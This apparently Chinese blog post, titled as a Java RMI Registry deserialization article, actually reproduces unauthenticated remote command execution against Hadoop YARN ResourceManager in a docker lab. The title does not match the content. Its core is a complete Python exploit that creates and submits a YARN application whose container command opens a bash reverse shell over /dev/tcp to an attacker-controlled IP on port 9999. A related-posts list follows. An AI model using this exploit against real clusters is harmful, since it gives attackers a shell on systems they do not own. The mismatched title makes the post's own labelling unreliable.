新后端漏洞(上)- Java RMI Registry反序列化漏洞

漏洞介绍:

参考 http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf
漏洞环境:

docker 环境

docker-compose up -d

环境启动后,访问http://127.0.0.1:8088即可看到Hadoop YARN ResourceManager WebUI页面。

1、漏洞复现:

通过任务执行,利用过程如下:

1、在本地监听等待反弹 shell 连接

2、调用 New Application API 创建 Application

3、调用 Submit Application API 提交

python 复制代码
#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.108.131' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

成功获取shell

相关推荐
风流倜傥唐伯虎19 分钟前
Spring Boot Jar包生产级启停脚本
java·运维·spring boot
Yvonne爱编码30 分钟前
JAVA数据结构 DAY6-栈和队列
java·开发语言·数据结构·python
Re.不晚30 分钟前
JAVA进阶之路——无奖问答挑战1
java·开发语言
你这个代码我看不懂38 分钟前
@ConditionalOnProperty不直接使用松绑定规则
java·开发语言
fuquxiaoguang1 小时前
深入浅出:使用MDC构建SpringBoot全链路请求追踪系统
java·spring boot·后端·调用链分析
琹箐1 小时前
最大堆和最小堆 实现思路
java·开发语言·算法
__WanG1 小时前
JavaTuples 库分析
java
坚持就完事了1 小时前
数据结构之树(Java实现)
java·算法
Monly212 小时前
Java:修改打包配置文件
java·开发语言
roman_日积跬步-终至千里2 小时前
【架构设计与实现】动态数据源切换:核心代码实现手册
java